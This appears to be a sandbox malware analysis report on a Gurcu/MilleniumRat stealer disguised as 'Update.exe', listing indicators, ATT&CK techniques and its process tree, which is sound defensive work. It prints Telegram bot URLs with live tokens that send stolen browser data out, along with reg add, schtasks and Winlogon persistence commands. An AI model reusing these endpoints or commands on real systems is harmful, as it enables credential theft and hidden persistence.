gurcu | e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf

Analysis

max time kernel
148s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
10-11-2024 11:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Update.exe
Size

5.6MB
MD5

3d3c49dd5d13a242b436e0a065cd6837
SHA1

e38a773ffa08452c449ca5a880d89cfad24b6f1b
SHA256

e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
SHA512

dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
SSDEEP

98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY

Score

10^/10

gurcu milleniumrat discovery persistence rat spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getFile?file_id=BQACAgEAAyEFAASF2AHzAALo3WcwmcehFPvNynQBCeo2gxCR8vwUAAJtBAAC1teJRYu6MMZ5zbZgNg

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/sendMessage?chat_id=6024388590

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat
Milleniumrat family
milleniumrat

Modifies WinLogon for persistence 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

ChainComServermonitor.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\explorer.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\explorer.exe\", \"C:\\Windows\\Downloaded Program Files\\fontdrvhost.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\explorer.exe\", \"C:\\Windows\\Downloaded Program Files\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\sppsvc.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\explorer.exe\", \"C:\\Windows\\Downloaded Program Files\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\sppsvc.exe\", \"C:\\Recovery\\WindowsRE\\sihost.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\explorer.exe\", \"C:\\Windows\\Downloaded Program Files\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\sppsvc.exe\", \"C:\\Recovery\\WindowsRE\\sihost.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\""	ChainComServermonitor.exe

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1040	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1316	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1388	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3892	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4864	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1196	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4148	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3864	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3920	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2776	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3080	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3552	4180	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	4180	schtasks.exe

Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

Update.exesvchost64.exeChainComServermonitor.exesihost.exe

pid process

3148 Update.exe
2484 svchost64.exe
428 ChainComServermonitor.exe
556 sihost.exe
Loads dropped DLL 2 IoCs

Processes:

Update.exeUpdate.exe

pid process

3464 Update.exe
3148 Update.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

pid	process
3148	Update.exe
2484	svchost64.exe
428	ChainComServermonitor.exe
556	sihost.exe

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exeChainComServermonitor.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\Downloaded Program Files\\fontdrvhost.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\sppsvc.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\sppsvc.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\Default\\explorer.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\Default\\explorer.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\Downloaded Program Files\\fontdrvhost.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Recovery\\WindowsRE\\sihost.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Recovery\\WindowsRE\\sihost.exe\""	ChainComServermonitor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\""	ChainComServermonitor.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
3 raw.githubusercontent.com
6 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

flow	ioc
1	raw.githubusercontent.com
3	raw.githubusercontent.com
6	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

csc.exe

description	ioc	process
File created	\??\c:\Windows\System32\j7xqt2.exe	csc.exe
File created	\??\c:\Windows\System32\CSC417EF92A53744646A18694A5662D75A.TMP	csc.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1364 tasklist.exe

pid	process
1364	tasklist.exe

Drops file in Program Files directory 2 IoCs

Processes:

ChainComServermonitor.exe

description	ioc	process
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe	ChainComServermonitor.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\0a1fd5f707cd16	ChainComServermonitor.exe

Drops file in Windows directory 2 IoCs

Processes:

ChainComServermonitor.exe

description	ioc	process
File created	C:\Windows\Downloaded Program Files\fontdrvhost.exe	ChainComServermonitor.exe
File created	C:\Windows\Downloaded Program Files\5b884080fd4f94	ChainComServermonitor.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

svchost64.exeWScript.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Update.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3808 timeout.exe

pid	process
3808	timeout.exe

Modifies registry class 2 IoCs

Processes:

svchost64.exeChainComServermonitor.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	svchost64.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	ChainComServermonitor.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1964 reg.exe

pid	process
1964	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1704	schtasks.exe
3920	schtasks.exe
3080	schtasks.exe
4864	schtasks.exe
4808	schtasks.exe
3552	schtasks.exe
1040	schtasks.exe
3892	schtasks.exe
1196	schtasks.exe
3864	schtasks.exe
2776	schtasks.exe
1940	schtasks.exe
1316	schtasks.exe
1388	schtasks.exe
4148	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Update.exeUpdate.exe

pid	process
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3464	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe
3148	Update.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

Update.exetasklist.exeUpdate.exeChainComServermonitor.exesihost.exe

description	pid	process
Token: SeDebugPrivilege	3464	Update.exe
Token: SeDebugPrivilege	1364	tasklist.exe
Token: SeDebugPrivilege	3148	Update.exe
Token: SeDebugPrivilege	428	ChainComServermonitor.exe
Token: SeDebugPrivilege	556	sihost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Update.exe

pid process

3148 Update.exe

pid	process
3148	Update.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

Update.execmd.exeUpdate.execmd.exesvchost64.exeWScript.execmd.exeChainComServermonitor.execsc.execsc.execmd.exe

description	pid	process	target process
PID 3464 wrote to memory of 4184	3464	Update.exe	cmd.exe
PID 3464 wrote to memory of 4184	3464	Update.exe	cmd.exe
PID 4184 wrote to memory of 1364	4184	cmd.exe	tasklist.exe
PID 4184 wrote to memory of 1364	4184	cmd.exe	tasklist.exe
PID 4184 wrote to memory of 1960	4184	cmd.exe	find.exe
PID 4184 wrote to memory of 1960	4184	cmd.exe	find.exe
PID 4184 wrote to memory of 3808	4184	cmd.exe	timeout.exe
PID 4184 wrote to memory of 3808	4184	cmd.exe	timeout.exe
PID 4184 wrote to memory of 3148	4184	cmd.exe	Update.exe
PID 4184 wrote to memory of 3148	4184	cmd.exe	Update.exe
PID 3148 wrote to memory of 4124	3148	Update.exe	cmd.exe
PID 3148 wrote to memory of 4124	3148	Update.exe	cmd.exe
PID 4124 wrote to memory of 1964	4124	cmd.exe	reg.exe
PID 4124 wrote to memory of 1964	4124	cmd.exe	reg.exe
PID 3148 wrote to memory of 2484	3148	Update.exe	svchost64.exe
PID 3148 wrote to memory of 2484	3148	Update.exe	svchost64.exe
PID 3148 wrote to memory of 2484	3148	Update.exe	svchost64.exe
PID 2484 wrote to memory of 3012	2484	svchost64.exe	WScript.exe
PID 2484 wrote to memory of 3012	2484	svchost64.exe	WScript.exe
PID 2484 wrote to memory of 3012	2484	svchost64.exe	WScript.exe
PID 3012 wrote to memory of 1096	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 1096	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 1096	3012	WScript.exe	cmd.exe
PID 1096 wrote to memory of 428	1096	cmd.exe	ChainComServermonitor.exe
PID 1096 wrote to memory of 428	1096	cmd.exe	ChainComServermonitor.exe
PID 428 wrote to memory of 5032	428	ChainComServermonitor.exe	csc.exe
PID 428 wrote to memory of 5032	428	ChainComServermonitor.exe	csc.exe
PID 5032 wrote to memory of 2184	5032	csc.exe	cvtres.exe
PID 5032 wrote to memory of 2184	5032	csc.exe	cvtres.exe
PID 428 wrote to memory of 4888	428	ChainComServermonitor.exe	csc.exe
PID 428 wrote to memory of 4888	428	ChainComServermonitor.exe	csc.exe
PID 4888 wrote to memory of 5104	4888	csc.exe	cvtres.exe
PID 4888 wrote to memory of 5104	4888	csc.exe	cvtres.exe
PID 428 wrote to memory of 4052	428	ChainComServermonitor.exe	cmd.exe
PID 428 wrote to memory of 4052	428	ChainComServermonitor.exe	cmd.exe
PID 4052 wrote to memory of 3352	4052	cmd.exe	chcp.com
PID 4052 wrote to memory of 3352	4052	cmd.exe	chcp.com
PID 4052 wrote to memory of 3716	4052	cmd.exe	w32tm.exe
PID 4052 wrote to memory of 3716	4052	cmd.exe	w32tm.exe
PID 4052 wrote to memory of 556	4052	cmd.exe	sihost.exe
PID 4052 wrote to memory of 556	4052	cmd.exe	sihost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Update.exe
"C:\Users\Admin\AppData\Local\Temp\Update.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3464
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAB44.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAB44.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 3464"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1364
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:1960
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3808
- - C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
    "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4124
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1964
  - - C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe
      "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2484
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3012
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
        7⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:428
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ipyqrt3q\ipyqrt3q.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5032
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9CE.tmp" "c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSCEF000E877E57451AA5DB62FAA9D1E29.TMP"
        9⤵
        
        PID:2184
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zjmdnnsy\zjmdnnsy.cmdline"
        8⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:4888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA7A.tmp" "c:\Windows\System32\CSC417EF92A53744646A18694A5662D75A.TMP"
        9⤵
        
        PID:5104
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MCaZm091jB.bat"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4052
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:3352
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:3716
        
        C:\Recovery\WindowsRE\sihost.exe
        
        "C:\Recovery\WindowsRE\sihost.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Users\Default\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Default\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Windows\Downloaded Program Files\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

Filesize
1KB

MD5
f6124be7822087101cfaca65733653f4

SHA1
cc40c3110d3ae90008b0a4930259a0c18bba1703

SHA256
4451dab0c07cb97f3f4e71be86ebb6f895b139a13a6c1df97ca5028a216f6925

SHA512
f4bc2d963e9aecc93cb2d602b94c95521d461483665d128d0d4b7266b5686691973e6496706d9cd35816cd946a38c9c1c6482b80c264588eefdfafb69ac59835

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
